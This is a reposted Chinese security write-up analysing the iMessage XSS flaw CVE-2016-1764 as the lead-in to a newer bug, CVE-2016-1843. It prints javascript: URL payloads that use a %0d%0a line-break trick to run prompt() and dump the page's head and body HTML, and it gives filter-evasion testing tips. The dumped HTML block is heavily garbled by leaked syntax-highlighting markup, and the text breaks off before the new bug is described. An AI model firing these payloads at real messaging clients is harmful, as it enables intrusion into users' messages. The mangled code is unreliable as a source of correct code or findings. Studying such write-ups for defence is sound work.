未加星标

从老漏洞到新漏洞―iMessage 0day(CVE-2016-1843)挖掘实录

字体大小 | |
[前端(javascript) 所属分类 前端(javascript) | 发布者 店小二03 | 时间 2016 | 作者 红领巾 ] 0人收藏点击收藏

Author: SuperHei (知道创宇404安全实验室) Date: 2016-04-08

注:文章里“0day”在报告给官方后分配漏洞编号:CVE-2016-1843

0x00 背景

在前几天老外发布了一个在3月更新里修复的 iMessage xss 漏洞(CVE-2016-1764)细节 :

https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/ https://github.com/BishopFox/cve-2016-1764

他们公布这些细节里其实没有给出详细触发点的分析,我分析后也就是根据这些信息发现了一个新的 0day。

0x01 CVE-2016-1764 漏洞分析

CVE-2016-1764 里的最简单的触发payload: javascript://a/research?%0d%0aprompt(1) 可以看出这个是很明显javascript协议里的一个小技巧 %0d%0 没处理后导致的 xss ,这个 tips 在找 xss 漏洞里是比较常见的。

这个值得提一下的是 为啥要用 prompt(1) 而我们常用的是 alert(1) ,我实际测试了下发现 alert 确实没办法弹出来,另外在很多的网站其实把 alert 直接和谐过滤了,所以这里给提醒大家的是在测试xss的时候,把 prompt 替换 alert 是有必要的~

遇到这样的客户端的 xss 如果要分析,第一步应该看看 location.href 的信息。这个主要是看是哪个域下,这个漏洞是在 applewebdata:// 协议下,这个原漏洞分析里有给出。然后要看具体的触发点,一般在浏览器下我们可以通过看 html 源代码来分析,但是在客户端下一般看不到,所以这里用到一个小技巧:

javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)

这里是 html 里的 head 代码

<style>@media screen and (-webkit-device-pixel-ratio:2) {}</style><link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">

继续看下 body 的代码:

javascript<spanclass="token punctuation">:</span><spanclass="token operator">/</span><spanclass="token operator">/</span>a<spanclass="token operator">/</span>research<spanclass="token operator">?</span><spanclass="token operator">%</span>0d<spanclass="token operator">%</span><spanclass="token function">0aprompt<spanclass="token punctuation">(</span></span><spanclass="token number">1</span><spanclass="token punctuation">,</span>document<spanclass="token punctuation">.</span>body<spanclass="token punctuation">.</span>innerHTML<spanclass="token punctuation">)</span> <spanclass="token operator"><</span>chatitemid<spanclass="token operator">=</span><spanclass="token string">"<a class="tokenemail-link" href="mailto:v:[email protected]">v:[email protected]</a>/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> contiguous<spanclass="token operator">=</span><spanclass="token string">"no"</span> role<spanclass="token operator">=</span><spanclass="token string">"heading"</span> aria<spanclass="token operator">-</span>level<spanclass="token operator">=</span><spanclass="token string">"1"</span> item<spanclass="token operator">-</span>type<spanclass="token operator">=</span><spanclass="token string">"header"</span><spanclass="token operator">></span><spanclass="token operator"><</span>headerguid<spanclass="token operator">=</span><spanclass="token string">"<a class="tokenemail-link" href="mailto:v:[email protected]">v:[email protected]</a>/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span><spanclass="token operator">></span><spanclass="token operator"><</span>headermessagetext<spanclass="token operator">-</span>direction<spanclass="token operator">=</span><spanclass="token string">"ltr"</span><spanclass="token operator">></span>与“<a class="token email-link" href="mailto:[email protected]">[email protected]</a><spanclass="token punctuation">.</span>com”进行 iMessage 通信<spanclass="token operator"><</span><spanclass="token operator">/</span>headermessage<spanclass="token operator">></span><spanclass="token operator"><</span><spanclass="token operator">/</span>header<spanclass="token operator">></span><spanclass="token operator"><</span><spanclass="token operator">/</span>chatitem<spanclass="token operator">></span><spanclass="token operator"><</span>chatitemid<spanclass="token operator">=</span><spanclass="token string">"d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> contiguous<spanclass="token operator">=</span><spanclass="token string">"no"</span> role<spanclass="token operator">=</span><spanclass="token string">"heading"</span> aria<spanclass="token operator">-</span>level<spanclass="token operator">=</span><spanclass="token string">"2"</span> item<spanclass="token operator">-</span>type<spanclass="token operator">=</span><spanclass="token string">"timestamp"</span><spanclass="token operator">></span><spanclass="token operator"><</span>timestampguid<spanclass="token operator">=</span><spanclass="token string">"d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> id<spanclass="token operator">=</span><spanclass="token string">"d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span><spanclass="token operator">></span><spanclass="token operator"><</span>datedate<spanclass="token operator">=</span><spanclass="token string">"481908183.907740"</span><spanclass="token operator">></span>今天 <spanclass="token number">23</span><spanclass="token punctuation">:</span><spanclass="token number">23</span><spanclass="token operator"><</span><spanclass="token operator">/</span>date<spanclass="token operator">></span><spanclass="token operator"><</span><spanclass="token operator">/</span>timestamp<spanclass="token operator">></span><spanclass="token operator"><</span><spanclass="token operator">/</span>chatitem<spanclass="token operator">></span><spanclass="token operator"><</span>chatitemid<spanclass="token operator">=</span><spanclass="token string">"p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> contiguous<spanclass="token operator">=</span><spanclass="token string">"no"</span> chatitem<spanclass="token operator">-</span>message<spanclass="token operator">=</span><spanclass="token string">"yes"</span> role<spanclass="token operator">=</span><spanclass="token string">"presentation"</span> display<spanclass="token operator">-</span>type<spanclass="token operator">=</span><spanclass="token string">"balloon"</span> item<spanclass="token operator">-</span>type<spanclass="token operator">=</span><spanclass="token string">"text"</span> group<spanclass="token operator">-</span>last<spanclass="token operator">-</span>message<spanclass="token operator">-</span>ignore<spanclass="token operator">-</span>timestamps<spanclass="token operator">=</span><spanclass="token string">"yes"</span> group<spanclass="token operator">-</span>first<spanclass="token operator">-</span>message<spanclass="token operator">-</span>ignore<spanclass="token operator">-</span>timestamps<spanclass="token operator">=</span><spanclass="token string">"yes"&l

本文前端(javascript)相关术语:javascript是什么意思 javascript下载 javascript权威指南 javascript基础教程 javascript 正则表达式 javascript设计模式 javascript高级程序设计 精通javascript javascript教程

主题: HTML浏览器其实
分页:12
转载请注明
本文标题:从老漏洞到新漏洞―iMessage 0day(CVE-2016-1843)挖掘实录
本站链接:http://www.codesec.net/view/482061.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 前端(javascript) | 评论(0) | 阅读(19)